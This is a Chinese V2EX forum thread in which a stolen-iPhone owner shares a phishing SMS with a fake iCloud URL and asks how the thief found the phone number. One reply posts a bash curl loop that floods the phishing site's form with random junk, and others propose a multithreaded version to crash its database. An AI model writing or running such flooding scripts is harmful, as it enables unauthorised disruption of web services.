iPhone 被盗之后收到一个钓鱼短信,已使用 SIM PIN 锁,小偷是如何得知手机号码的?

2017-10-06 14:13:57 +08:00
 acoada
iPhone 6s plus,iOS11。passcode 使用强密码,开了指纹解锁,修改并开启了 SIM PIN,不清楚小偷是如何拿到我手机号的。

下面附上钓鱼短信内容:

iCloud 提醒:您云端“照片流”正在恢复至李浩的 iPhone 设备,由于本次操作属于异地同步。本人操作请忽略此通知,如非您本人操作请及时登录 www.icloud.hrsyw.cn/id 取消操作或临时冻结您的 iCloud 账号。 [ Apple 安全中心]

号码:‭+852 5519 1681 ‬
— — —

另外,「李浩」是谁?🙃
8661 次点击
所在节点    iPhone
21 条回复
lingaoyi
2017-10-06 14:16:13 +08:00
据闻万能到某宝可以知道,SIM 锁我记得错了三次就没了吧
terence4444
2017-10-06 14:33:04 +08:00
还是 cn 域名,各种拍照备案实名制有什么狗屁用处?
leafleave
2017-10-06 14:33:12 +08:00
卡的后面有一串编号,跟你的手机号是绑定的,应该是有运营商内鬼查的
terence4444
2017-10-06 14:35:03 +08:00
只是拿到了手机号,手机和卡 PIN 码并没有解锁。到底怎么拿到的要看 PIN 是不是保护手机号码。
LuckCode
2017-10-06 14:50:05 +08:00
二楼+1
gam2046
2017-10-06 15:05:23 +08:00
闲得无聊的老哥,保存成 sh 运行一下,不想跑了就 ctrl + c 中断吧。

while :
do
var1=$(head -246 /dev/urandom | cksum)
var2=$(head -246 /dev/urandom | cksum)
var3=$(head -246 /dev/urandom | cksum)
curl "http://www.icloud.hrsyw.cn/ht/saveb.asp" \
-H "Cookie: ASPSESSIONIDACABSAQR=IDBFEFIDGLCMLGDBFEODOGCF" \
-H "Origin: http://www.icloud.hrsyw.cn" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4" \
-H "Upgrade-Insecure-Requests: 1" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" \
-H "Cache-Control: max-age=0" \
-H "Referer: http://www.icloud.hrsyw.cn/ht/savea.asp" \
-H "Connection: keep-alive" \
--data "dna_answer_1=^%^C4^%^E3^%^D0^%^A1^%^CA^%^B1^%^BA^%^F2^%^D7^%^EE^%^CF^%^B2^%^BB^%^B6^%^C4^%^C4^%^D2^%^BB^%^B1^%^BE^%^CA^%^E9^%^A3^%^B$
-s \
--compressed > /dev/null;
done
gamexg
2017-10-06 15:53:32 +08:00
直接打 10086 就可以根据 sim 卡上面的编号查到手机号,试过很多次。
Osk
2017-10-06 16:01:31 +08:00
@gam2046 老哥稳 666
ashfinal
2017-10-06 16:46:07 +08:00
@gam2046 看着像是向网站提交垃圾数据 😄
搞个 python 版吧,多线程,广泛传播。分分钟爆了他家数据库。
l9rw
2017-10-06 16:59:41 +08:00
@gam2046 #6 老哥倒数第四行少了个引号
paradoxs
2017-10-06 17:02:20 +08:00
如果你的锁屏密码是 6 位纯数字,那直接就给你破了
gam2046
2017-10-06 17:29:42 +08:00
@ashfinal @l9rw 散了吧。其实是用 console 复制出来,结果被自动截断了,挺长的一段。没啥的,chrome 访问一下,可以直接把请求 copy as curl。稍微包装一下,就是这样了。没啥技术含量。
fuxkcsdn
2017-10-06 17:51:16 +08:00
@paradoxs 现在已经那么牛 X 了?
ashfinal
2017-10-06 18:08:48 +08:00
@gam2046 Safari 也能 copy as curl,之前稍微看过一点 curl 参数……
这种小站没啥防御,多线程分分钟搞瘫。别人我不知道,楼主我猜是非常愿意搞一搞的 😊
wessin
2017-10-06 20:26:42 +08:00
@leafleave 肯定是这样
jasontse
2017-10-06 20:32:34 +08:00
@gam2046
delete from appleid where ip = 'x.x.x.x'
eyp82
2017-10-07 00:56:26 +08:00
好奇上了一下那骗子网站. 想吐槽的是做坏事能不能认真点, 那又大有模糊的字体, 粗糙的版面设计.......
wql
2017-10-07 10:10:40 +08:00
PIN 输错三次查 PUK 解锁啊……
danielzh
2017-10-07 22:47:41 +08:00
@acoada @gamexg
学习了谢谢
bao3
2017-10-08 08:58:35 +08:00
@wql PUK 要机主身份请原件,或者网上营业厅(网上营业厅依赖手机号,或者单独邮箱账户)。所以要查 PUK 几乎是不可能的。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/395645

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX